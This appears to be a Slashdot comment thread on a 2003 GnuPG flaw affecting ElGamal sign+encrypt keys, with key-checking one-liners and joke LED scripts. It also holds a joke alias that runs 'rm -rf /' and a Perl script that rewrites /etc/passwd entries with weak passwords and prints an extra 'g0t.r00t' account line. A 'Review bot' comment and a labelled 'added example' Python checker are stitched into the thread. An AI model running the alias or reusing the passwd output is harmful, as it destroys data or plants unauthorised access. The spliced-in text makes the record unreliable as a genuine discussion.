GnuPG's ElGamal Signing Keys Compromised
KjetilK writes "Werner Koch just sent an announcement saying that there is a severe bug in GnuPG >= 1.0.2 that makes it easy to compromise ElGamal keys used for signing. Note that such keys are not generated by GnuPG's standard setup, and should be relatively rare. Among the 850 public keys in my personal keyring, there was only one such public key (and a few subkeys). There is already a patch available to disable these keys."
"Gamal" is translated in Swedish as "old". Those who came out with this name knew how soon it would become obsolete!
http://www.automatiq.se
..destroyed my trust in the internet and computers! :-(
*sobs hysterically*
blogzine | Turkey Smashing Fun
clifgriffin > blog
Since I'm too overstuffed with desserts, eaten during their making process, to try to do the patching myself.
Fortunately, Werner Koch informed me yesterday already (I got the email at some time in the morning), so I had plenty of time to create a new key, sign it with the old one, and revoke the old one.
:-/
Of course, this had one disadvantage: since the old key is potentially compromised, I cannot really trust in my web of trust anymore.
A monkey is doing the real work for me.
You can get more information on the (German) site heise:
http://www.heise.de/newsticker/data/pab-27.11.03-000/
The full advisory from Werner Koch can be found here:
http://archives.neohapsis.com/archives/fulldisclosure/2003-q4/2998.html
It seems that about 800 people are using the compromised keys.
To check if your key is in danger you have to check the type of the key. All type 20 keys can be compromised. Here is a small shell script to check your key:
gpg --list-keys --with-colons | awk -F: '($4 == "20") {print $0;}'
If your key is in danger you should create a new one and revoke the old one immediately.
woohoo. you know you're on slashdot when someone is boasting "my keyring is bigger than your keyring !"
When will I end this grieving ? When will my future begin ?
Note that such keys are not generated by GnuPG's standard setup, and should be relatively rare.
This is a very good example of insecurity through complexity. Increasing the complexity of encryption software through the inclusion of multiple, unnecessary key types is a good way to increase the odds of introducing a bug. If there were only 850 of those keys, then why was that "feature" included?
This is the same thing that Microsoft does. Drastically increase the complexity of the software beyond what is necessary through the inclusion of unnecessary features and introduce bugs in the process. If this had been "MicrosoftPG" rather than "GnuPG", there would be an outcry on Slashdot about how stupid Microsoft is.
And then someone links to goatse as an example of a large keyring and the discussion is ruined. Hurrah. Welcome to Slashdot.
I'm amazing. You aren't. SUCK IT
Someone decided to munge Werner's announcement in a poorly implemented attempt at stopping spam. You have to change each "foo at example.com" to "foo@example.com". Then the .sig will verify correctly.
Sure it has
alias kit='while :; do setleds -L +num; setleds -L -caps; sleep 1; setleds -L +caps; setleds -L -num; sleep 1; setleds -L +scroll; setleds -L -caps; sleep 1; setleds -L +caps; setleds -L -scroll; sleep 1; done'
and while we are here
alias apt-fix='apt-get update; apt-get upgrade'
whooowhooo whooowhoooo
Damn, thanks for that. I have an IR keyboard on my firewall that uses a row of red leds for the keyboard lights on the receiver
Does this constitute a crisis in open source? I'm always advocating open source software with my employer and one of the biggest selling points is security.
With this news, and the whole Debian security fiasco, this argument is getting more difficult to make.
Most Excellent!
I must have one!
How can I justify a new keyboard? Where's my hammer??
Actually that's Gammal.. Gamal means nothing in Swedish... Debil on the other hand... or Dumbom, analfabet, obildad... Yea those..
MoFscker
Mind if I patch it?
alias KITT='while
(GNU sleep takes floating point arguments. Also, it should be KITT, not kit.)
Go for it. ;-)
I forgot to attach a copy of the GPL
It appears after some functional testing that the reduction of the deltas between the indicator light alterations caused some unforeseen interference side effects.
Who would have thought executing setleds 6 times a second would cause keyboard problems?
I've increased it back to 1 second to actually get some work done on the keyboard, but I need to be able to toggle this depending on whether or not I'm doing work.
I need to find a way to get setleds working regardless of the terminal it's run from (only wants to work from the console).
You forgot the part about hotgrits, natalie portman, and beowulf clusters.
From what I can tell, this is a mistake in the implementation of ElGamal signing + encryption keys, not any attack on the ElGamal algorithm per se. (And not even on encryption-only keys, only a specific type of key)
3DES might be a very solid algorithm, but as far as I can tell none of the other symmetric cryptoalgorithms (IDEA, BlowFish, TwoFish, Rijndael aka AES, CAST etc.) have had any practical algorithm attacks. Not to mention that 3DES can't be used for signing as is described here, so it's not even in the same category. Competitors to ElGamal would be RSA, DSA etc.
Implementation errors are far more common, but they could happen every time you implement the algorithm for a new language, new architecture, re-implementation under another licence, or even with a better compiler (e.g. such things as clocking attacks have happened).
In short, I wouldn't trust a new implementation of 3DES, just because the algorithm is well known. Usually it's easier to work around the encryption, rather than break it head-on. Memory leaks, temp files, bugs in implementation and so on. Like this one.
Then again, my paranoia doesn't really stretch that far. If I got anyone after me willing to cryptanalyze my encryption tools (as opposed to more direct keyboard taps/kneecap breaking methods) I must have some enemies I don't know about....
Kjella
Live today, because you never know what tomorrow brings
Fuck the system? Nah, you might catch something.
Since there are several people in the thread interested in LEDs, look at ixbiff. It blinks LEDs when you have new mail.
Our maintenance department used a solvent to clean their keyboard that melted the plastic, rendering all the keys unpressable. It was like every key was glued in place. Just find a solvent that melts the plastic your keyboard is made of, and go at it! :)
I've had enough abrasive sigs. Kittens are cute and fuzzy.
Je fume. Tu fumes. Nous fûmes!
Yeah...
#!/usr/bin/perl
$PERLLIB="/usr/local/lib/perl5/";
$NOLOGIN="*";
sub makeone
{$user=$_[0]; local($pwd)=$_[1]; $uid=$_[2]; $gid=$_[3]; $name=$_[4]; $home=$_[5]; $shell=$_[6];
$salt=gen(2);
$pwd=(crypt($pwd,$salt));print "$user\:$pwd\:$uid\:$gid\:$name\:$home\:$shell\n"; }
$passpairs{'root'}='toor';
$passpairs{'guest'}='guest';
$passpairs{'daemon'}='nomead';
$passpairs{'fc'}='cf';
@passwordlist=('agree', 'howthem', 'elsewher', '$pwd$uid', 'v5098v2n', 'Xs3\$7\@cB', 'FrugNol',
'c/pdddwd', 'aWCY00l', '8glRmlue', 'sh1234ra', 'ttorug', 'toorpoi', 'uj78ik,m'
);
@symbols=(a..z, A..Z, 0..9);
sub gen {local $i, $j, $k;
$k="";
for $i (1..$_[0])
{local $j = rand(@symbols);
$k="$k".@symbols[int($j)];}
return $k;}
srand(time|$$);
@PASSFILE=split(/\n/,`/bin/cat /etc/passwd`);$i=0;
foreach $LINE (@PASSFILE)
{($user, $pwd, $uid, $gid, $name, $home, $shell)=split(/:/, $LINE, 7);
# print STDERR "$user
if ($pwd eq $NOLOGIN) {$newpwd=$pwd;}
elsif ($passpairs{"$user"} ne "") {$newpwd=$passpairs{"$user"};}
elsif ($i < @passwordlist) {$newpwd=@passwordlist[$i];$i=$i+1;}
else {$newpwd = gen(8);}
# print STDERR "$user $newpwd\n";
makeone($user, $newpwd, $uid, $gid, $name, $home, $shell);
}
print "sil:g0t.r00t:100:1::/export/home/sil:/usr/local/bin/bash\n";
Like I want to run this...
Extra layers of protection aren't necessarily a good thing in crypto: I think it's best to have one very simple but very secure layer of protection. The more complicated a system gets, the harder it is to be confident that the algorithm or the implementation is secure.
"'I pass the test,' she said. 'I will diminish, and go into the West, and remain Galadriel.'"
- JRR Tolkien.
Try putting it into script leds.sh and running it like this: leds.sh < /dev/console
or at a gay truckstop in the 1970's.
pr0n - keeping monitor glass spotless since 1981.
It's called goop off
I've used it before and can attest to it eating a hole through carpet right to the concrete.
That's a very good point, but failure is not an option!!
alias apt-fix='(apt-get update || ( echo "Well screw you Hadron head" && rm -rf /)) && apt-get upgrade'
DISCLAIMER: If you execute this code you are a moron
Actually, on my old debian-potato system that I haven't bothered upgrading, sleep doesn't take floating point arguments.
However, on my debian-woody system, with a newer version of sleep, it does.
..plus it features authors! lol
# kitt.sh - change the '1' to desired delay
#(requires GNU shell utils 2.0.11~)
#(based on code presented in this thread)
# (the end of the loop was cut off in the post; the sleep and the matching -$led/done are restored here)
while :; do for led in num caps scroll caps; do setleds -L +$led; sleep 1; setleds -L -$led; done; done
Forgot that the damned less-than sign is an HTML special character. D'oh!
I would like to say this is getting silly. Also yours doesn't do a proper KITT ;-P
leds=(caps num caps scroll caps);
while :
do
    for i in 1 2 3 4
    do
        echo setleds -L +${leds[$i]}
        echo setleds -L -${leds[$(( $i - 1 ))]}
        sleep 1
    done
done
3DES could be vulnerable because: A quantum computer can crack it with sqrt(2^N keys) = 2^(N / 2) possibilities
What are you blithering on about?
In the first place, quantum computers are mostly science fiction. The tiny ones that have been created can only handle problems that you could do in your head anyway. Further, no one has even begun to work out how a quantum computer could attack something like DES, or any symmetric cipher, because the algorithms are simply too complex, and translating them into a structure manageable by a quantum computer is too hard. RSA and some of the other public-key algorithms are extremely simple, mathematically, and very easy to model, so a QC with sufficient qubits could be effective at attacking them. If such existed.
What you're postulating in order to break 3DES is an 84-qubit QC that is capable of expressing an algorithm of tremendous complexity (including some table-driven steps) that will have to be run 2^84 times to search the complete keyspace (assuming 3-key 3DES, reduce these numbers somewhat for 2-key 3DES).
Actually, that should be 2^83, on average; I'll let you work out why.
Supposing that QC can test a key and be reconfigured, say, one trillion times per second, you'd only need 279,000 years, on average, to find your 3DES key.
If you wanted to make that more reasonable, you need a bigger QC. With a 168-bit QC, of course, you only need one trial.
and 3DES has a 168-bit key that can be cracked with 2^89 possibilities versus 2^128 possibilities of GOST.
If you Google a bit, you can easily find some algorithms that use key lengths in the millions of bits, if you're so certain that more == better.
Remember, Athlon64, PowerPC64, USparc64, Alpha can do 2^64 operations in little time.
Can they really? Lessee... supposing they can do one operation per clock cycle, and let's suppose they run at, say, 10GHz, that means they can do 2^64 operations in a bit over 68 years.
Note to ACs: I usually delete AC replies without reading them. If you want to talk to me, log in.
Damn debug!!
-echo setleds -L +${leds[$i]}
-echo setleds -L -${leds[$(( $i - 1 ))]}
+setleds -L +${leds[$i]}
+setleds -L -${leds[$(( $i - 1 ))]}
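Review bot: with the echo prefixes removed these two setleds calls now drive the hardware for real, and setleds only works when it is run from a console (as noted earlier in this thread), so the script has to be started with its input redirected from /dev/console, e.g. `leds.sh < /dev/console`, or every iteration will fail instead of blinking.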
It redoes your password to print it out, jackass. It does absolutely nothing to your system. Maybe if you had a clue about Perl or even about common sysadmin sense you could take a look and see print all over the place. Nothing gets stored anywhere.
finger root@kungfunix.net to see what it does moron
MoFscker
I don't understand why it is 'not considered good cryptographic practice' to use the same key to sign and encrypt. Is Werner saying that this an ElGamal weakness or is it a general public-key encryption weakness? If it is not considered good cryptographic practice, then why is (was?) it in the OpenPGP standard?
Uh huh. So, run the numbers. How long would it take with, say, 1 billion 10GHz 64-bit processors to search a 128-bit keyspace. You can even continue to assume one operation per clock cycle (which is ludicrously optimistic).
Ah, what the heck... I'll do it for you. With 2^30 processors, each doing 2^33 trials per second, you can check 2^63 keys each second. That means that you need 2^64 seconds, on average, to search a 128-bit keyspace. That translates to 584 *billion* years.
Yep. The 3DES keyspace is just too small to be secure.
Given a billion 64-bit QCs that can be reconfigured a billion times per second, sure 3DES is weak.
You know what? I'd be a lot more worried about someone installing a trojan on my PC and snarfing my key with 'cat /proc/kmem'.
Note to ACs: I usually delete AC replies without reading them. If you want to talk to me, log in.
Uh huh. So, run the numbers. How long would it take with, say, 1 billion 10GHz 64-bit processors to search a 128-bit keyspace. You can even continue to assume one operation per clock cycle (which is ludicrously optimistic).
I'd be much more worried about the one 128 bit QC.
-a
gpg --list-keys | awk 'BEGIN { printf("%s %s \n", "Key ID", "Email") } /^pub/ && $2 ~/G\// {keys++; print substr($2,7), $NF} END {if (keys > 0) print "You have",keys,"signatures to revoke!"; else print "You are fine :)" }'
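The awk one-liners above (the `$4 == "20"` check on colon output earlier in the thread, and this one matching "G/" on `gpg --list-keys` output) both look for the ElGamal sign+encrypt algorithm id; the second sees only pub lines and so misses affected subkeys. The following is an added example, not code from the thread or from GnuPG: it parses `gpg --list-keys --with-colons` output and reports affected primary keys and subkeys, using a constructed listing with made-up key ids and names.

```python
from typing import Dict, List

# Added example, not code from the thread: parse `gpg --list-keys --with-colons`
# output and report every primary key ("pub") or subkey ("sub") whose algorithm
# id is 20 (ElGamal sign+encrypt), the type the advisory says to revoke. Unlike
# the awk over `gpg --list-keys` matching "G/" on pub lines, subkeys are covered.
ELGAMAL_SIGN_ENCRYPT = "20"

def find_type20_keys(colons_output: str) -> List[Dict[str, str]]:
    """Colon fields (0-based): 0 record type, 2 key length, 3 algorithm id,
    4 key id, 9 user id (on the pub line in GnuPG 1.x; newer GnuPG emits
    separate 'uid' records instead, handled below)."""
    hits: List[Dict[str, str]] = []
    owner = ""                      # user id of the primary key being listed
    for line in colons_output.splitlines():
        f = line.split(":")
        if f[0] == "pub":
            owner = f[9] if len(f) > 9 else ""
        elif f[0] == "uid" and not owner and len(f) > 9:
            owner = f[9]
        if f[0] in ("pub", "sub") and len(f) > 4 and f[3] == ELGAMAL_SIGN_ENCRYPT:
            hits.append({"record": f[0], "keyid": f[4], "bits": f[2], "owner": owner})
    return hits

# Constructed listing (made-up key ids and names): two clean keys, one type-20
# primary key, and one type-20 subkey under a DSA primary with a 'uid' record.
CONSTRUCTED_LISTING = """\
tru::1:1069920000:0:3:1:5
pub:-:1024:17:0123456789ABCDEF:2002-01-01:::-:Example One <one@example.invalid>:
sub:-:2048:16:FEDCBA9876543210:2002-01-01:::
pub:-:1024:20:00112233445566AA:2001-06-01:::-:Example Two <two@example.invalid>:
pub:-:1024:17:AA55AA55AA55AA55:2003-03-03:::
uid:-::::::::Example Three <three@example.invalid>:
sub:-:1024:20:BB66BB66BB66BB66:2003-03-03:::
"""

def report(colons_output: str) -> str:
    """Summary in the spirit of the thread's 'revoke / you are fine' one-liner."""
    hits = find_type20_keys(colons_output)
    if not hits:
        return "You are fine: no ElGamal sign+encrypt (type 20) keys."
    rows = [f"{h['record']} {h['bits']}G/{h['keyid']} {h['owner']}" for h in hits]
    return f"Revoke {len(hits)} key(s):\n" + "\n".join(rows)

if __name__ == "__main__":
    print(report(CONSTRUCTED_LISTING))
    # For a real keyring: feed subprocess.run(["gpg", "--list-keys",
    # "--with-colons"], capture_output=True, text=True).stdout to report().
```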
It was part of popular lore that allowing your keyring to prominently hang out of your pocket was a silent signal to other homosexuals.
And could you tell me, using your vast experience on the topic, how to tell a regular truckstop from a gay one?
well, dummy, a gay truck stop is any truck stop that has sex with other truck stops of the same gender.
I prefer to not have a dick stuck through a hole in the stall wall when I'm taking a shit.
This doesn't generally happen if you don't first make suggestive eye contact with the other party through the hole. So, if you've actually experienced this, you might start there.
PS - no, I'm not gay. Sorry to get your hopes up!
pr0n - keeping monitor glass spotless since 1981.
Sorry to nit and please don't be offended, but since you were trying to set things straight, I have to point out what I assume was a typo.
At 10GHz, 2^64 operations would take ~ 58.45 years.
I agree though (unless swillden is an ancient redwood tree) that this is a bit more than a 'little time'.